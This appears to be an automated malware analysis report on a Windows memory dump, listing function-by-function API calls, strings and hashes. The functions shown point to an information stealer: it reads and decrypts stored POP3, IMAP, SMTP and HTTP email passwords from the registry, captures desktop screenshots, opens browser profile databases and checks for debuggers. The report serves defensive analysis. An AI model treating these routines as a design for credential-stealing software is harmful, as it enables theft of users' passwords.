Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A3E2
Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A41E
Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A45E

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$CredFreelstrlen$CreateCryptDataEnumerateInitializeInstanceLibraryLoadLocalUnprotectVersion
String ID:
API String ID: 1367598280-0
Opcode ID: 6c80f3bb9b7919e58b39df1b233aa9bb1dc29917460d2c4c51bb628cb8dc8a73
Instruction ID: ebd16326eb686ad43e5c991a10910887fe2c550f7f1a0d1f856031dafe3edce1
Opcode Fuzzy Hash: 6c80f3bb9b7919e58b39df1b233aa9bb1dc29917460d2c4c51bb628cb8dc8a73
Instruction Fuzzy Hash: F8E0C230668204ABC204EB51ED07B6AB3D8DB40B19F40865DBC9C422D0BFB8AD24D66B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00434A5F, Relevance: 73.8, APIs: 10, Strings: 32, Instructions: 282stringencryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 0043592B: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
Part of subcall function 0043592B: RegCloseKey.ADVAPI32(00000100), ref: 004359EE

CryptUnprotectData.CRYPT32(0047CB80,00000000,00000000,00000000,00000000,00000001,?), ref: 00434CB2
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00434CEA
lstrlenW.KERNEL32(POP3 Password,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00434CF7
lstrlenW.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00434D1B
lstrlenW.KERNEL32(POP3 Port,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00434D9C
wsprintfA.USER32 ref: 00434DC8
lstrlenA.KERNEL32(?), ref: 00434DD5
lstrlenW.KERNEL32(000007FF,?,?,00000000,00000000), ref: 00434B4A

Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68

lstrlenW.KERNEL32(SMTP Email Address,?,?,00000000,00000000), ref: 00434B26

Part of subcall function 00435A1E: lstrlenA.KERNEL32(?,?,74E069A0,?,00000000), ref: 00435A4F
Part of subcall function 00435A1E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0,?,00000000), ref: 00435A6E
Part of subcall function 00435A1E: lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0,?,00000000), ref: 00435A91
Part of subcall function 00435A1E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000001B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0), ref: 00435ABD

Part of subcall function 00435ADB: lstrlenA.KERNEL32(?,?,?,?,?,?,?,00429C15,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435B00
Part of subcall function 00435ADB: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,00429C15,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435B27

lstrlenW.KERNEL32(POP3 Password2,?,?,?,?,?,?,00000000,00000000), ref: 00434BC9

Strings

IMAP Port, xrefs: 00434D6B
POP3 Server, xrefs: 00434A86
HTTPMail Server, xrefs: 00434AFA
SMTP Email Address, xrefs: 00434A6E, 00434B10, 00434B25
HTTP Password, xrefs: 00434C36
POP3 Password, xrefs: 00434C20, 00434C55, 00434CF6
NNTP Server, xrefs: 00434ABB
SMTP Password, xrefs: 00434C3D
IMAP User, xrefs: 00434AEC
IMAP Server, xrefs: 00434AC2
SMTP Server, xrefs: 00434A73
NNTP Email Address, xrefs: 00434AAA
SMTP User, xrefs: 00434B01
%d, xrefs: 00434DC2
NNTP Password, xrefs: 00434C2F
SMTP User Name, xrefs: 00434AA0
NNTP User Name, xrefs: 00434AB4
HTTP User, xrefs: 00434AD7
SMTP Port, xrefs: 00434D61
POP3 User, xrefs: 00434AE5
POP3 Password2, xrefs: 00434B81, 00434BB3, 00434BC8
HTTPMail Password2, xrefs: 00434B97
SMTP Password2, xrefs: 00434B9E
Email, xrefs: 00434AD0
HTTPMail User Name, xrefs: 00434AF3
IMAP Password2, xrefs: 00434B86
POP3 Port, xrefs: 00434D5C, 00434D80, 00434D9B
POP3 User Name, xrefs: 00434A96
HTTP Server URL, xrefs: 00434ADE
IMAP User Name, xrefs: 00434AC9
IMAP Password, xrefs: 00434C25
NNTP Password2, xrefs: 00434B90

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiQueryValueWidelstrcpy$CloseCryptDataFreeLocalOpenUnprotect_freewsprintf
String ID: %d$Email$HTTP Password$HTTP Server URL$HTTP User$HTTPMail Password2$HTTPMail Server$HTTPMail User Name$IMAP Password$IMAP Password2$IMAP Port$IMAP Server$IMAP User$IMAP User Name$NNTP Email Address$NNTP Password$NNTP Password2$NNTP Server$NNTP User Name$POP3 Password$POP3 Password2$POP3 Port$POP3 Server$POP3 User$POP3 User Name$SMTP Email Address$SMTP Password$SMTP Password2$SMTP Port$SMTP Server$SMTP User$SMTP User Name
API String ID: 2832241015-3646352405
Opcode ID: 72fb23e4c2fa91feac477979f322b6e2e1dcc1cc9a7e55b61101fed14ab6b8a1
Instruction ID: 91bb0a062eb22744b558d3d2405683025fa418893456fa80a50a6e8a22fc02ee
Opcode Fuzzy Hash: 72fb23e4c2fa91feac477979f322b6e2e1dcc1cc9a7e55b61101fed14ab6b8a1
Instruction Fuzzy Hash: B1B153B1E002189BDF00EF959885BEE77B9AF49304F14D05EE409BB341DBB86E458B99

Uniqueness

Uniqueness Score: -1.00%

Function 0042C157, Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 193windowmemoryfileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042C15C
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0042C18A
GetDesktopWindow.USER32 ref: 0042C190
GetWindowRect.USER32 ref: 0042C19D
GetWindowDC.USER32(00000000), ref: 0042C1A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042C1C4
CreateCompatibleDC.GDI32(00000000), ref: 0042C1CD
CreateDIBSection.GDI32(?,00000028,00000001,?,00000000,00000000), ref: 0042C218
DeleteDC.GDI32(00000000), ref: 0042C22C
DeleteDC.GDI32(?), ref: 0042C231
SaveDC.GDI32(00000000), ref: 0042C238
SelectObject.GDI32(00000000,?), ref: 0042C244
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042C25D
RestoreDC.GDI32(00000000,00000000), ref: 0042C265
DeleteDC.GDI32(00000000), ref: 0042C272
DeleteDC.GDI32(?), ref: 0042C277
GdipAlloc.GDIPLUS(00000010), ref: 0042C27B
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0042C29B
_mbstowcs.LIBCMT ref: 0042C30E
GdipSaveImageToFile.GDIPLUS(?,00000000,?,?), ref: 0042C32B
DeleteObject.GDI32(00000010), ref: 0042C350
GdiplusShutdown.GDIPLUS(?), ref: 0042C359

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

(, xrefs: 0042C1EC

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Delete$CreateGdipWindow$GdiplusObjectSave$AllocBitmapCapsCompatibleDeallocateDesktopDeviceFileFromH_prologImageRectRestoreSectionSelectShutdownStartup_mbstowcs
String ID: (
API String ID: 4140672344-3887548279
Opcode ID: 062156f9da9476c7d83830b067653b8898b9941109b84b55887bfb3140d3f7c0
Instruction ID: 536baf2ac2d265ee9edbed5a4aa1064016baa7b26e1b3fc26adfe330e756f817
Opcode Fuzzy Hash: 062156f9da9476c7d83830b067653b8898b9941109b84b55887bfb3140d3f7c0
Instruction Fuzzy Hash: D471F5B2E00219EFDB11DFA5DD849AEBBB8FF08344F10452AE906E7210E7745942CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00422D2B, Relevance: 19.8, APIs: 4, Strings: 7, Instructions: 593COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00422D30
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 00422D5C

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

sqlite3_finalize.NSS3(?), ref: 00423524
sqlite3_close.NSS3(?), ref: 00423531

Strings

], xrefs: 00423237
Profiles, xrefs: 00422D6E
,x~yi, xrefs: 004232CD
zv`, xrefs: 00423031
G, xrefs: 00423351
%cdiv`, xrefs: 004232F6
`, xrefs: 0042332F

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate$FolderPath_strcatsqlite3_closesqlite3_finalize
String ID: %cdiv`$,x~yi$G$Profiles$]$`$zv`
API String ID: 1363784328-781617784
Opcode ID: ff8cf3b742a8ecf41872469e8f791c22fc2411cadb35decd11f2618184d2018f
Instruction ID: d8a1a7678dddb3245489243c8c1f9a4158df91878c47eb1026a4bf6f17522207
Opcode Fuzzy Hash: ff8cf3b742a8ecf41872469e8f791c22fc2411cadb35decd11f2618184d2018f
Instruction Fuzzy Hash: B7429C30E04398DBDF15DBA4D890BDDBBB1AF59304F1040AED4497B282DB785E89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00462391, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

GetACP.KERNEL32(?,?,?,?,?,?,004555FC,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00462452
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004555FC,?,?,?,00000055,?,-00000050,?,?), ref: 0046247D
_wcschr.LIBVCRUNTIME ref: 00462511
_wcschr.LIBVCRUNTIME ref: 0046251F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004625E0

Strings

utf8, xrefs: 0046254F
0&G, xrefs: 00462408

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: 0&G$utf8
API String ID: 4147378913-2116212543
Opcode ID: 28e527850fa7b31019f655cd1a1be333e9fc89f3bbd8298ec0b10fafe0388aae
Instruction ID: 80d7c2a65ae141ca0afc562d5d58411de800cdeae6eec3c0137acb6db90b692b
Opcode Fuzzy Hash: 28e527850fa7b31019f655cd1a1be333e9fc89f3bbd8298ec0b10fafe0388aae
Instruction Fuzzy Hash: 1B711971A00A01B6D725AB35CD45BAB73A8EF44354F14442BF906D7281FBBCE941876F

Uniqueness

Uniqueness Score: -1.00%

Function 00462CF2, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
Part of subcall function 004571CB: _free.LIBCMT ref: 00457263

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00462DFE
IsValidCodePage.KERNEL32(00000000), ref: 00462E47
IsValidLocale.KERNEL32(?,00000001), ref: 00462E56
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00462E9E
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00462EBD

Strings

0&G, xrefs: 00462DAB

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID: 0&G
API String ID: 949163717-4031540117
Opcode ID: cd39c310aa637117c93bf4081066d7437827290a16fd8fd16966563f2804ea81
Instruction ID: 1d3261a399e5f10e9d6bd41579e0021277c6c2d0d88e0b97eccc3c8f871f5250
Opcode Fuzzy Hash: cd39c310aa637117c93bf4081066d7437827290a16fd8fd16966563f2804ea81
Instruction Fuzzy Hash: 2D51A171A00A05BBDB10DFA5DE45AEF73B8AF15700F14443BE900E7281FBF999448B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00462B1D, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,;.F,00000002,00000000,?,?,?,00462E3B,?,00000000), ref: 00462BB6
GetLocaleInfoW.KERNEL32(?,20001004,;.F,00000002,00000000,?,?,?,00462E3B,?,00000000), ref: 00462BDF
GetACP.KERNEL32(?,?,00462E3B,?,00000000), ref: 00462BF4

Strings

;.F, xrefs: 00462BD0, 00462BED, 00462BA7, 00462BC0, 00462BAA, 00462BD3
ACP, xrefs: 00462B3B
OCP, xrefs: 00462B71

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoLocale
String ID: ;.F$ACP$OCP
API String ID: 2299586839-1457925780
Opcode ID: 5c7067c7b288a4d404b23b9a970682669cb147bbd759df666153cb31040f7199
Instruction ID: 379cace6e81663d93113db7ee644bfd9379d2bd014fb6d52a8f329d2a92a608a
Opcode Fuzzy Hash: 5c7067c7b288a4d404b23b9a970682669cb147bbd759df666153cb31040f7199
Instruction Fuzzy Hash: AA21A162B00901BADB348F14CB01B9773A6EB54F61B168426E90AD7204F7BAEE41D35E

Uniqueness

Uniqueness Score: -1.00%

Function 0046475B, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 004648D6

Strings

1#INF, xrefs: 00465A91
1#SNAN, xrefs: 00465A6D
1#QNAN, xrefs: 00465A74
1#IND, xrefs: 00465A66

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 9bfc77a39340625b6a86301f1729f2823a018047853ca022371e3ebffeb52bd6
Instruction ID: b99cd9423779b4525a49100b28b65ef5ab2a0d10b4fffb5f170f5505121d02b7
Opcode Fuzzy Hash: 9bfc77a39340625b6a86301f1729f2823a018047853ca022371e3ebffeb52bd6
Instruction Fuzzy Hash: AFC22671E046288FDF25CE28DD407EAB3B5EB89315F1441EBD84DA7240E778AE858F46

Uniqueness

Uniqueness Score: -1.00%

Function 004187EC, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 479COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004187F1

Strings

;g~OS^I^NV, xrefs: 00418BA7
]l, xrefs: 00418DFC
4, xrefs: 0041881A
UTC_, xrefs: 0041897A, 00418CE2

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: 4$;g~OS^I^NV$UTC_$]l
API String ID: 3519838083-94711056
Opcode ID: cf5c71315b5b45d70fa74cfe003e8971a2a3adc9656a030347f63973707ec4d2
Instruction ID: c0c91f5fd6471e2e50090fd34c7bad8f20c85e4933e5248af696d8c31e721590
Opcode Fuzzy Hash: cf5c71315b5b45d70fa74cfe003e8971a2a3adc9656a030347f63973707ec4d2
Instruction Fuzzy Hash: 8022AF70D002888BDF15EFA5C950AEDFBB5AF59304F1480AFE44577282DF781A89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0044A480, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450COMMON

Download Yara Rule

Strings

|XF, xrefs: 0044A49B, 0044A624, 0044A84D, 0044A7E7, 0044A673, 0044A5F9
|XF, xrefs: 0044A8A7, 0044A6E5, 0044A6ED

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: |XF$|XF
API String ID: 0-514644214
Opcode ID: 2d847a52f5baafd09b63a6ef73b7ffb79837118a5456080be83dbd4c6ff1e96c
Instruction ID: a2fcbab35829f1a111f05cde10400a04ba28e7ece359143868105aa135b3a241
Opcode Fuzzy Hash: 2d847a52f5baafd09b63a6ef73b7ffb79837118a5456080be83dbd4c6ff1e96c
Instruction Fuzzy Hash: D5F16E71E402199FEF14CFA9C9806AEBBB1FF48314F15826ED819AB340D734AE11CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041EBE9, Relevance: 6.5, Strings: 5, Instructions: 277COMMON

Download Yara Rule

Strings

need dictionary, xrefs: 0041EEFA
unknown compression method, xrefs: 0041EC53
incorrect data check, xrefs: 0041EDFA
incorrect header check, xrefs: 0041ECC0
invalid window size, xrefs: 0041EC72

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: incorrect data check$incorrect header check$invalid window size$need dictionary$unknown compression method
API String ID: 0-2151277842
Opcode ID: 924b15dbf6a6470855d361110034c46afb2abe93b6f2ab4350515d2f06f1459d
Instruction ID: 6b9b747d69bed3b381a42e3d42685e617446427c5f72de8439c62fc88671226d
Opcode Fuzzy Hash: 924b15dbf6a6470855d361110034c46afb2abe93b6f2ab4350515d2f06f1459d
Instruction Fuzzy Hash: 99B1E4B5600701CFD374CF1AC484A62BBF0EB49714B258A5ED8EACB752D739E886CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00440B62, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00440B6E
IsDebuggerPresent.KERNEL32 ref: 00440C3A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00440C5A
UnhandledExceptionFilter.KERNEL32(?), ref: 00440C64

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: f967f4adda7a0b6eafcce18aeababb87d47420303b1c5124f15b8f9715fa39ad
Instruction ID: bee11a539c97b005e841a0db625c3b4e910789cb48280a66c3f9e376b6664827
Opcode Fuzzy Hash: f967f4adda7a0b6eafcce18aeababb87d47420303b1c5124f15b8f9715fa39ad
Instruction Fuzzy Hash: 36311A75D0531DDBEB20DFA5DD89BCDBBB8AF08304F1041EAE509A7250EB749A848F49

Uniqueness

Uniqueness Score: -1.00%

Function 004627A4, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
Part of subcall function 004571CB: _free.LIBCMT ref: 00457263

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004627F8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462842
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462908

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: 03a44e678e49a72788f6fa958e4446c0cb9ca14480530f1661c040c35672a11a
Instruction ID: 8fdc4d0ca9bcdec7de62ba05e5a14b9e9ad91cb5cc159aebfe6bae3a79f0d915
Opcode Fuzzy Hash: 03a44e678e49a72788f6fa958e4446c0cb9ca14480530f1661c040c35672a11a
Instruction Fuzzy Hash: 4361D671A00907ABDB249F25CD82BAA73A8EF44310F10457BED05D6281F7B8D985DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00446625, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0044671D
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00446727
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00446734

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2d4006cb0a490a5fe41f1898d73e103fe16c5dc7b54f67e4d822d4b5d790393b
Instruction ID: 384e1e98cc9cb4c7df0328988c5faaeb1f33e534a7a093ac3da55adf85ff94e3
Opcode Fuzzy Hash: 2d4006cb0a490a5fe41f1898d73e103fe16c5dc7b54f67e4d822d4b5d790393b
Instruction Fuzzy Hash: 0331C274D0121C9BDB21DF65DD8978DBBB8BF08314F6041EAE41CA7250EB749B858F49

Uniqueness

Uniqueness Score: -1.00%

Function 0043E03E, Relevance: 4.6, APIs: 3, Instructions: 56timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000001,00000000), ref: 0043E076
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000), ref: 0043E084

Part of subcall function 0043D95B: FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,0043E09B,?,?,?,?,?,?,?,?,00000001), ref: 0043D970

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043E0B6

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: c4a1475bebf23b47c5bec081c9681e59432db96943158db8f55715bca652824d
Instruction ID: 5dc5bb988949e37033fa7e8de2553708aac0068194ea5f1efb77c9820a47ae7e
Opcode Fuzzy Hash: c4a1475bebf23b47c5bec081c9681e59432db96943158db8f55715bca652824d
Instruction Fuzzy Hash: 53110DB1D00B189FDB25DFAAC8819EBFBF8FF08204B00492ED196D3650E774A504CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0045C559, Relevance: 3.1, APIs: 2, Instructions: 55COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,00000001,?,0044EA2A,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,00000001,00421A95,?,?,?,00000000,00000480), ref: 0045C4E2
OutputDebugStringW.KERNEL32(00000000,?,0044EA2A,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,00000001,00421A95,?,?,?,00000000,00000480,A:\_Work\rc-build-v1-exe\json.hpp), ref: 0045C4F9

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DebugDebuggerOutputPresentString
String ID:
API String ID: 4086329628-0
Opcode ID: 25770f6f7dd1c086d772aad6d8623a7e1a5b5ad8f89f666f21ef17a06f7924ca
Instruction ID: 0d2b1a0ade15b69f2d7347783be55e8742076589e60eba3c6b6eb5fe894b00fa
Opcode Fuzzy Hash: 25770f6f7dd1c086d772aad6d8623a7e1a5b5ad8f89f666f21ef17a06f7924ca
Instruction Fuzzy Hash: AE01B17110032D7BDA202E965C82B6F3759AB01767F180017FD15A6243EE69E81AA1AE

Uniqueness

Uniqueness Score: -1.00%

Function 00440985, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0044099B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 97ef42a2c544be722fb6d023d3c943f4503bb43cf0619ee2a3bcd1cbb7cb48ce
Instruction ID: 618e401a7c8a0adeb8250b96beae0f9c79fd158a929ca41e9a49ff9f097408f7
Opcode Fuzzy Hash: 97ef42a2c544be722fb6d023d3c943f4503bb43cf0619ee2a3bcd1cbb7cb48ce
Instruction Fuzzy Hash: 11514AB1A012068FEB14CF94D8917AEBBF0FB54314F24886AD515FB351E378A950CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004629F7, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
Part of subcall function 004571CB: _free.LIBCMT ref: 00457263

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462A4B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 61b0c6a9bb120798ef32ad72ce2bfbe8f939892477555181889b6636e3d09e98
Instruction ID: d4d0c1b07770b8756cd372bfa24e877e454908c764530ebdd94d195e8e0c32f5
Opcode Fuzzy Hash: 61b0c6a9bb120798ef32ad72ce2bfbe8f939892477555181889b6636e3d09e98
Instruction Fuzzy Hash: 0B21A171641606BBDB289AA5DD41ABB73A8EF44305F10007FFD01D6241FAB8DD45C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0046267E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

EnumSystemLocalesW.KERNEL32(004627A4,00000001,00000000,?,-00000050,?,00462DD2,00000000,?,?,?,00000055,?), ref: 004626F0

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 53abe61e9f7f88496ddc64f022bd9303cdf0d5838115ca1bfcc0d4334bffb6e6
Instruction ID: a214c30e2b0840ca46362df8f44745d076b74c97768bb3cb79ee071566a33ec8
Opcode Fuzzy Hash: 53abe61e9f7f88496ddc64f022bd9303cdf0d5838115ca1bfcc0d4334bffb6e6
Instruction Fuzzy Hash: 5A114C3B604B016FDB189F39C9915BAB791FF80359B15443EE98787740E7B57802C744

Uniqueness

Uniqueness Score: -1.00%

Function 00462C23, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

